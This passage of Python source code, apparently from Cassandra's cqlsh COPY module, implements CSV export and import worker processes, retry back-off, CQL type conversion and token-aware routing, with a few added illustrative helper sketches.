self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
# attributes for coverage
self.coverage = params['coverage']
self.coveragerc_path = params['coveragerc_path']
self.coverage_collection = None
self.sigterm_handler = None
self.sighup_handler = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
def start_coverage(self):
import coverage
self.coverage_collection = coverage.Coverage(config_file=self.coveragerc_path)
self.coverage_collection.start()
# save current handlers for SIGTERM and SIGHUP
self.sigterm_handler = signal.getsignal(signal.SIGTERM)
self.sighup_handler = signal.getsignal(signal.SIGHUP)
def handle_sigterm(signum, frame):
self.stop_coverage()
self.close()
self.terminate()
# set custom handler for SIGHUP and SIGTERM
# needed to make sure coverage data is saved
signal.signal(signal.SIGTERM, handle_sigterm)
signal.signal(signal.SIGHUP, handle_sigterm)
def stop_coverage(self):
self.coverage_collection.stop()
self.coverage_collection.save()
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGHUP, self.sighup_handler)
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back off, we wait a random number of seconds between 0 and 2^c - 1, where c is the
number of failures so far (a sketch of this calculation follows the class).
:return: the number of seconds to wait, or -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
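# A minimal sketch (not part of the original module) of ExpBackoffRetryPolicy.backoff(): the delay
# for retry number `retry_num` is a random integer in [0, 2^(retry_num + 1) - 1] seconds, and -1
# (do not retry) once retry_num reaches max_attempts. The helper name is hypothetical.
def _example_backoff_delay(retry_num, max_attempts):
    from random import randint
    if retry_num >= max_attempts:
        return -1
    return randint(0, pow(2, retry_num + 1) - 1)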
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
A child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
if self.coverage:
self.start_coverage()
try:
self.inner_run()
finally:
if self.coverage:
self.stop_coverage()
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
while psutil.virtual_memory().percent > 80:
time.sleep(60)
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = str(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in list(self.hosts_to_sessions.values()))
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort the replicas, favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect to all of them, we report an error so that the
token range will be retried later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception as e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in list(self.hosts_to_sessions.keys()):
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO() if six.PY3 else BytesIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(list(map(self.format_value, row, cql_types)))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception as e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
formatted = formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
return formatted if six.PY3 else formatted.encode('utf8')
def close(self):
ChildProcess.close(self)
for session in list(self.hosts_to_sessions.values()):
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
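# A minimal sketch (not part of the original module) of the CQL generated by
# ExportProcess.prepare_export_query() for a single-column partition key: the token range becomes
# a token() restriction with an exclusive lower bound and an inclusive upper bound. Quoting of
# keyspace, table and column names is omitted here for brevity; the helper name is hypothetical.
def _example_export_query(ks, table, pk_col, start_token, end_token):
    query = 'SELECT * FROM %s.%s' % (ks, table)
    if start_token is not None or end_token is not None:
        query += ' WHERE'
    if start_token is not None:
        query += ' token(%s) > %s' % (pk_col, start_token)
    if start_token is not None and end_token is not None:
        query += ' AND'
    if end_token is not None:
        query += ' token(%s) <= %s' % (pk_col, end_token)
    return query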
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImmutableDict(frozenset):
"""
Immutable dictionary implementation to represent map types.
We need to pass BoundStatement.bind() a dict() because it calls iteritems(),
but we can't create a dict that has another dict as a key, hence we use a class
that adds iteritems to a frozenset of tuples (which is how dicts are normally made
immutable in Python).
Must be declared in the top level of the module to be available for pickling.
"""
iteritems = frozenset.__iter__
def items(self):
for k, v in self.iteritems():
yield k, v
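# A minimal sketch (not part of the original module) of how ImmutableDict is meant to be used: it
# is built from key/value tuples, it is hashable (so it can itself be a map key or live in a set),
# and it exposes iteritems()/items() so callers can treat it like a dict. The helper name is
# hypothetical and the function is illustrative only.
def _example_immutable_dict_usage():
    d = ImmutableDict([('a', 1), ('b', 2)])
    as_plain_dict = dict(d.items())    # {'a': 1, 'b': 2}
    hashable = {d: 'works as a key'}   # a regular dict could not be used as a key here
    return as_plain_dict, hashable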
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv; it is used by ImportProcess,
which is passed in as the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement; these are the same as the types above
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. As far as I understood, this is the easiest
way to find out the types of the partition columns; we never actually execute this prepared statement.
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(ensure_str(select_query))
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value that can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
# we can't distinguish between empty strings and null values in csv. Null values are not supported in
# collections, so it must be an empty string.
if v == self.nullval and not issubclass(t, VarcharType):
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
if sys.version_info.major >= 3:
return bytes.fromhex(v[2:])
else:
return BlobType(v[2:].decode("hex"))
def convert_text(v, **_):
return ensure_str(v)
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == ensure_str(self.boolean_styles[0]).lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slower or a faster integer conversion function depending on whether self.thousands_sep is set
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ensure_str('')))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slower or a faster decimal conversion function depending on whether self.thousands_sep and self.decimal_sep are set
"""
empty_str = ensure_str('')
dot_str = ensure_str('.')
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str).replace(self.decimal_sep, dot_str))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, dot_str))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split "val" into a list of values whenever the separator "sep" is found, but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. This method is called when parsing composite
types, "val" should be at least 2 characters long, the first char should be an
open parenthesis and the last char should be a matching closing parenthesis. We could also
check exactly which parenthesis type depending on the caller, but I don't want to enforce
too many checks that don't necessarily provide any additional benefits, and risk breaking
data that could previously be imported, even if strictly speaking it is incorrect CQL.
For example, right now we accept sets that start with '[' and ']', I don't want to break this
by enforcing '{' and '}' in a minor release.
"""
def is_open_paren(cc):
return cc == '{' or cc == '[' or cc == '('
def is_close_paren(cc):
return cc == '}' or cc == ']' or cc == ')'
def paren_match(c1, c2):
return (c1 == '{' and c2 == '}') or (c1 == '[' and c2 == ']') or (c1 == '(' and c2 == ')')
if len(val) < 2 or not paren_match(val[0], val[-1]):
raise ParseError('Invalid composite string, it should start and end with matching parentheses: {}'
.format(val))
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if is_open_paren(c):
level += 1
elif is_close_paren(c):
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile(r"(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" # YYYY-MM-DD[( |'T')]
+ r"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" # [HH:MM[:SS[.NNNNNN]]]
+ r"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
if six.PY2:
# Python 2 implementation
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
else:
# Python 3 implementation
dtval = datetime.datetime.strptime(val, self.date_time_format)
return dtval.timestamp() * 1000
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/3/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1000) + milliseconds
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
See ImmutableDict above for a discussion of why a special object is needed here.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
vals = [v for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=int),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=int),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls: this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else (ensure_str("0") if self.is_counter else ensure_str("NULL"))
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check the row length and
make sure primary key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception as e:
# if we could not convert an empty string, then self.nullval has been set to a marker
# because the user needs to import empty strings. However, the converters for some types
# will fail to convert an empty string; in this case the null value should be inserted,
# see CASSANDRA-12794
if v == '':
return self.get_null_val()
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (v, e.message if hasattr(e, 'message') else str(e)))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
length = len(val)
pk_values.append(struct.pack(">H%dsB" % length, length, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
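# A minimal sketch (not part of the original module) of how the routing key is built for a
# composite partition key (mirroring serialize_row_multiple above, and BoundStatement.routing_key
# in the Python driver): each serialized component is packed as a two-byte big-endian length, the
# bytes themselves and a trailing zero byte, and the packed components are concatenated. The
# helper name is hypothetical and the values passed in are assumed to already be bytes.
def _example_composite_routing_key(serialized_pk_values):
    import struct
    packed = []
    for val in serialized_pk_values:
        packed.append(struct.pack(">H%dsB" % len(val), len(val), val, 0))
    return b"".join(packed)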
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
than the token classes when calling bisect_right() in split_into_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
# Note that refreshing metadata is disabled by default and we currently do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return [r for r in shuffled if r.is_up is not False and r.datacenter == self.local_dc] if hosts else ()
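# A minimal sketch (not part of the original module) of TokenMap.get_ring_pos(): the ring is a
# sorted list of primitive token values, bisect_right finds the first ring position whose token is
# greater than the row's token value, and positions past the end wrap around to 0. The helper name
# is hypothetical.
def _example_ring_pos(ring, token_value):
    from bisect import bisect_right
    idx = bisect_right(ring, token_value)
    return idx if idx < len(ring) else 0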
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any of the replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
exponential back-off if all connections to the eligible replicas already have too many in-flight requests.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in range(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
# the back-off starts at 10 ms (0.01) and it can go up to 2^max_backoff_attempts,
# which is currently 12, so 2^12 = 4096, or ~40 seconds once multiplied by 0.01
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper around the driver's default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
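# A minimal sketch (not part of the original module) of the overload check used by
# FastTokenAwarePolicy.make_query_plan(): a replica is eligible only if its registered
# ConnectionWrapper has fewer in-flight requests than both the connection's own limit
# (max_request_id) and the configured MAXINFLIGHTMESSAGES option; replicas with no registered
# connection yet are always eligible. The helper name is hypothetical.
def _example_replica_is_not_overloaded(replica_address, max_inflight_messages):
    conn = ConnectionWrapper.connections.get(replica_address)
    if conn is None:
        return True
    return conn.in_flight < min(conn.max_request_id, max_inflight_messages)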
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.request_timeout = options.copy['requesttimeout']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
